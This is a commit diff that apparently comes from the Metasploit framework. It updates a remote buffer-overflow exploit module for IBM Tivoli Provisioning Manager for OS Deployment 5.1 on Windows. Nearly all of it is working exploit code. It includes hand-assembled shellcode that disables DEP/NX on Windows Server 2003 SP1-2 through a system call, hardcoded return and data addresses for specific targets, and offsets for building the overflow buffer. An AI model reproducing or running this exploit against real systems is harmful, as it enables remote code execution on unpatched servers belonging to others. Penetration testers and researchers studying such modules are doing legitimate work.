From topo:
1) It uses the rembo.exe Data section to prevent a crash 2) The prepend code has been modified to only disable NX on 2K3 SP1-2 (else it crashes 2K3 SP0) git-svn-id: file:///home/svn/framework3/trunk@4863 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
88d3193020
commit
3604c87c22
|
@ -39,17 +39,22 @@ class Exploits::Windows::Http::Ibm_Tpmfosd_Overflow < Msf::Exploit::Remote
|
|||
'Prepend' =>
|
||||
# Disable NX on 2k3 to upload data on the stack
|
||||
# (service crashes if the stack is switched to the heap)
|
||||
"\xb9\x70\x02\xfe\x7f" + # mov ecx, 0x7ffe0270
|
||||
"\x80\x39\x02" + # cmp byte ptr [ecx], 2
|
||||
"\x75\x15" + # jmp after
|
||||
"\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
|
||||
"\xb8\xed\x00\x00\x00" + # mov eax, 0xed
|
||||
"\x6a\x04" + # push 4
|
||||
"\x51" + # push ecx
|
||||
"\x6a\x22" + # push 22
|
||||
"\x6a\xff" + # push -1
|
||||
"\x6a\xff" + # push -1 (padding)
|
||||
"\xff\x12", # call dword ptr[edx]
|
||||
"\x64\x8b\x0d\x30\x00\x00\x00" + # mov ecx, dword ptr fs:[0x30] ; PEB
|
||||
"\x83\xb9\xa4\x00\x00\x00\x05" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5
|
||||
"\x75\x30" + # jnz after
|
||||
"\x83\xb9\xa8\x00\x00\x00\x02" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2
|
||||
"\x75\x27" + # jnz after
|
||||
"\x81\xb9\xac\x00\x00\x00\xce\x0e\x00\x00" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0)
|
||||
"\x76\x1b" + # jbe after
|
||||
"\x8d\x89\xa8\x00\x00\x00" + # lea ecx, [ecx+0xa8]
|
||||
"\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
|
||||
"\xb8\xed\x00\x00\x00" + # mov eax, 0xed
|
||||
"\x6a\x04" + # push 4
|
||||
"\x51" + # push ecx
|
||||
"\x6a\x22" + # push 22
|
||||
"\x6a\xff" + # push -1
|
||||
"\x6a\xff" + # push -1 (padding)
|
||||
"\xff\x12", # call dword ptr[edx]
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
|
@ -57,7 +62,7 @@ class Exploits::Windows::Http::Ibm_Tpmfosd_Overflow < Msf::Exploit::Remote
|
|||
[
|
||||
['TMPfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }],
|
||||
# tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll)
|
||||
['TMPfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000 }],
|
||||
['TMPfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000, 'Data' => 0x01061980 }],
|
||||
],
|
||||
'DisclosureDate' => 'May 02 2007',
|
||||
'DefaultTarget' => 0))
|
||||
|
@ -88,7 +93,7 @@ class Exploits::Windows::Http::Ibm_Tpmfosd_Overflow < Msf::Exploit::Remote
|
|||
# retn
|
||||
|
||||
auth[ 2096, 4 ] = [ ib + 0x1a5f ].pack('V')
|
||||
auth[ 2100, 4 ] = [ ib + 0x11010 ].pack('V')
|
||||
auth[ 2100, 4 ] = [ target['Data'] ].pack('V')
|
||||
auth[ 2104, 4 ] = [ ib + 0x11010 ].pack('V')
|
||||
auth[ 2108, 4 ] = [ ib + 0x11010 ].pack('V')
|
||||
|
||||
|
|
Loading…
Reference in New Issue